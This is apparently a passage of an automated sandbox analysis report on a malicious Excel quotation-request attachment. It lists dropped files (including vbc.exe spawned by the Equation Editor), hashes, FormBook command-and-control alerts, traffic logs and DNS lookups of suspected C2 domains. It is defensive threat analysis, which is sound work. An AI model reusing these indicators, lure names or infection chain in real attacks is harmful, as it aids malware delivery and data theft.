                                        SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                        Malicious:false
                                        Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA3F8406.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):11303
                                        Entropy (8bit):7.909402464702408
                                        Encrypted:false
                                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                        Malicious:false
                                        Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EDDAAE1E.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):6364
                                        Entropy (8bit):7.935202367366306
                                        Encrypted:false
                                        SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                        MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                        SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                        SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                        SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                        Malicious:false
                                        Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                        C:\Users\user\AppData\Local\Temp\8zftlgz66rml6hsb
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):218412
                                        Entropy (8bit):7.993510370418697
                                        Encrypted:true
                                        SSDEEP:6144:umeBJUO9Vjq25jLjIs+8FlB2qqoHfCarGr:6Bp9Vjq25jPImFlHbr8
                                        MD5:A66A52A4F615A7C03C69396F33AFB49F
                                        SHA1:70FCB923AEBCEFC959BC5EE119E2E6FCA2B522AD
                                        SHA-256:00C5F1976314ACC54F6689B202AA205BED647074381898370F3D13444A90B3DE
                                        SHA-512:964BEA08A7D6BF1C07240F48CE82B8410D5E7A789BBCD76917B615035073538AE77F098B9596A8C3E7AD5F4045BD4B36068FDD5F20CB6F803CF2B1B2FD49CB5D
                                        Malicious:false
                                        Preview: s\"5.;\.f..F.s...U.?[KmN.....#...IPVG:. |.\...b....z.I.x*...xR.r.R..1....iN...<..l...`|M,.)z.X...5....2e.~nV-AW.....7/f.V..L..Cv..r....e..v.6|._....(.K....b..4L.,..!..>.Wx.q,5.+WdL.....'..........r&-......."j.Ya..1...Wu(...X...k[.4.5.t'.]....g.~/.F.;\.fC.\.).%0_?.?.l..v......I.VGO. |.\.(..b....z.I.x*...xL.50R.4.s.M...M......s#:.|..^.s.FA.....K.P...l.d.......7/f.V..Y.a.D.. ........O..;...K...1...$...@._..p..."..r."q,5 3.d/.O.?..............?tkz.b.i."j.Ya..1..aWu........Ik[.4.5.t'.])...g../SF.;\.fs.\..%0_?.?.......G...IPVG:. |.\...b....z.I.x*...xL.50R.4.s.M...M......s#:.|..^.s.FA.....K.P...l.d.......7/f.V..Y.a.D.. ........O..;...K...1...$...@._..p...".Wx.q,5f.Wd/DO.?.............?tkz...i."j.Ya..1..aWu........Ik[.4.5.t'.])...g../SF.;\.fs.\..%0_?.?.......G...IPVG:. |.\...b....z.I.x*...xL.50R.4.s.M...M......s#:.|..^.s.FA.....K.P...l.d.......7/f.V..Y.a.D.. ........O..;...K...1...$...@._..p...".Wx.q,5f.Wd/DO.?.............?tkz...i."j.Ya..1..aWu..
                                        C:\Users\user\AppData\Local\Temp\nspBFD8.tmp\uoqeqjqp.dll
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):169472
                                        Entropy (8bit):6.369335775559218
                                        Encrypted:false
                                        SSDEEP:3072:BCDltBK32EKb80ZBphqHcPBZ6zDM2xIH51nzlVnwCg9:BCht9f5Y6Z6vMXzLG
                                        MD5:B99ADEF4A2044874BFEFBC6472A364FE
                                        SHA1:C8A100328B1F8480998AF4B82C75EF84C755D5F4
                                        SHA-256:C4BCD82279BD837652753D50D27E4461278991AB6BED3DA54F50003CFF804EEC
                                        SHA-512:DF07427D176374475A815896CB53F89EC71F47E0FEECD45054C4358A35C053F5E7900EC2A54CC4AB9EDA35C6EEBE18F47C79BFFE44E3D1514C406F9BA997CFFB
                                        Malicious:false
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................."...........................}...M......M......H......M......Rich...................PE..L......a...........!.........................0.......................................................................u......`v......................................`p...............................p..@............0..l............................text...l........................... ..`.rdata...S...0...T..................@..@.data....B.......&...n..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DF0A34D950D881ADFE.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:CDFV2 Encrypted
                                        Category:dropped
                                        Size (bytes):234520
                                        Entropy (8bit):7.970636264710058
                                        Encrypted:false
                                        SSDEEP:3072:gZfy7Qpz9a4UV0yosTOqZt+B0OH0UrmxKlwQyENBsGTDWgylTyUp7aQlelDjIWOM:ghXp5a4UFlYnHZix0wrGK3ta3VIpM
                                        MD5:90E995AE2B06B84644586091A994F43A
                                        SHA1:A6C83577FD947650A6B816FD910EBB7FD3464BCA
                                        SHA-256:1E8D78F614B82C1BDC730E745228B860D5B71888AC90EFBF5D74AF4EA3F876F9
                                        SHA-512:2AE4E833AA255BC20B870A2C08CE94E3A4CF7CD9248377CD4F5FBDC525F83AF8EAAB2DF1EBB82D1B7FC6E28F8A89DC10A1DB1C3A65100F656A7952A294B21B9F
                                        Malicious:false
                                        Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                        C:\Users\user\AppData\Local\Temp\~DF0FB8C472F0D83540.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Temp\~DF7FF8D0B81F71A466.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Temp\~DFF9926B065B1BF5C6.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        C:\Users\user\Desktop\~$Quotation Request - Alligator Pty Ltd.xlsx
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                        Malicious:true
                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        C:\Users\Public\vbc.exe
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):513443
                                        Entropy (8bit):7.37315837962637
                                        Encrypted:false
                                        SSDEEP:12288:7lIKV65P7x6p5laFBAteHb9Pzrv4QHA5A:7Cq47xO5MXAtYxbrQgAe
                                        MD5:8E90E8E526BC80036BA6B50A913A1880
                                        SHA1:56F076B442E362E58E787FCEA35CEA45A70447EE
                                        SHA-256:50901C9BDF963127A05847C8C0A1D71D8C02310C491A159CF87A1E888CEAB348
                                        SHA-512:60F5346007C19104284630001F665AE8B74C71DAB5B7BF8D6A60AA639281929A0F8E60DED6150A3B395DD56C0DC0A5B13824329CA1C093EC96ACAAAF50A0E5BA
                                        Malicious:true

                                        Static File Info

                                        General

                                        File type:CDFV2 Encrypted
                                        Entropy (8bit):7.970636264710058
                                        TrID:
                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                        File name:Quotation Request - Alligator Pty Ltd.xlsx
                                        File size:234520
                                        MD5:90e995ae2b06b84644586091a994f43a
                                        SHA1:a6c83577fd947650a6b816fd910ebb7fd3464bca
                                        SHA256:1e8d78f614b82c1bdc730e745228b860d5b71888ac90efbf5d74af4ea3f876f9
                                        SHA512:2ae4e833aa255bc20b870a2c08ce94e3a4cf7cd9248377cd4f5fbdc525f83af8eaab2df1ebb82d1b7fc6e28f8a89dc10a1db1c3a65100f656a7952a294b21b9f
                                        SSDEEP:3072:gZfy7Qpz9a4UV0yosTOqZt+B0OH0UrmxKlwQyENBsGTDWgylTyUp7aQlelDjIWOM:ghXp5a4UFlYnHZix0wrGK3ta3VIpM

                                        File Icon

                                        Icon Hash:e4e2aa8aa4b4bcb4

                                        Network Behavior

                                        Snort IDS Alerts

                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                        12/02/21-19:19:49.540569 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 47.246.136.142
                                        12/02/21-19:19:49.540569 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 47.246.136.142
                                        12/02/21-19:19:49.540569 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 47.246.136.142

                                        Network Port Distribution

                                        TCP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Dec 2, 2021 19:18:07.276129007 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.390578985 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.390664101 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.391019106 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.507664919 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.507770061 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.507807016 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.507838964 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.507875919 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.507925034 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.507945061 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.507988930 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.621927023 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.621970892 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.621994972 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.622023106 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.622112036 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.622150898 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.622312069 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.622400045 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.622411966 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.622437000 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.622452974 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.622462988 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.622478962 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.622487068 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.736310959 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.736378908 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.736412048 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.736454010 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.736534119 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.736938953 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.737015009 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.737035036 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.737051964 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.737070084 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.737087011 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.737099886 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.737116098 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.737124920 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.737169027 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.737170935 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.737211943 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.737247944 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.737265110 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.737291098 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.737304926 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.737351894 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.737370014 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.737389088 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.737397909 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.737411976 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.737425089 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.737474918 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.737520933 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.738908052 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.851687908 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.851716042 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.851738930 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.851762056 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.851773977 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.851798058 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.851800919 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.852946997 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.852974892 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.852996111 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853015900 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853037119 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853055954 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853147030 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853189945 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853204966 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853229046 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853251934 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853257895 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853279114 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853283882 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853358030 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853379965 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853394985 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853404045 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853421926 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853435993 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853446007 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853470087 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853537083 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853559017 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853573084 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853590012 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853631973 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853652954 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853678942 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853688955 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853806973 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853828907 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853847027 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853852034 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853876114 CET | 80 | 49165 | 107.173.191.75 | 192.168.2.22
                                        Dec 2, 2021 19:18:07.853876114 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75
                                        Dec 2, 2021 19:18:07.853904009 CET | 49165 | 80 | 192.168.2.22 | 107.173.191.75

                                        UDP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Dec 2, 2021 19:19:29.030253887 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                        Dec 2, 2021 19:19:29.141184092 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
                                        Dec 2, 2021 19:19:35.253619909 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                                        Dec 2, 2021 19:19:35.284832001 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
                                        Dec 2, 2021 19:19:40.431263924 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
                                        Dec 2, 2021 19:19:40.940474987 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22
                                        Dec 2, 2021 19:19:49.090929985 CET | 59030 | 53 | 192.168.2.22 | 8.8.8.8
                                        Dec 2, 2021 19:19:49.426925898 CET | 53 | 59030 | 8.8.8.8 | 192.168.2.22

                                        DNS Queries

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                        Dec 2, 2021 19:19:29.030253887 CET | 192.168.2.22 | 8.8.8.8 | 0x439c | Standard query (0) | www.travelgleam.com | A (IP address) | IN (0x0001)
                                        Dec 2, 2021 19:19:35.253619909 CET | 192.168.2.22 | 8.8.8.8 | 0x8eb8 | Standard query (0) | www.subsoilcorp.com | A (IP address) | IN (0x0001)
                                        Dec 2, 2021 19:19:40.431263924 CET | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.ll1ysq.biz | A (IP address) | IN (0x0001)
                                        Dec 2, 2021 19:19:49.090929985 CET | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.sdffzc.com | A (IP address) | IN (0x0001)

                                        DNS Answers

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                        Dec 2, 2021 19:19:29.141184092 CET | 8.8.8.8 | 192.168.2.22 | 0x439c | No error (0) | www.travelgleam.com | travelgleam.com | | CNAME (Canonical name) | IN (0x0001)
                                        Dec 2, 2021 19:19:29.141184092 CET | 8.8.8.8 | 192.168.2.22 | 0x439c | No error (0) | travelgleam.com | | 162.210.195.97 | A (IP address) | IN (0x0001)
                                        Dec 2, 2021 19:19:35.284832001 CET | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | Name error (3) | www.subsoilcorp.com | none | none | A (IP address) | IN (0x0001)
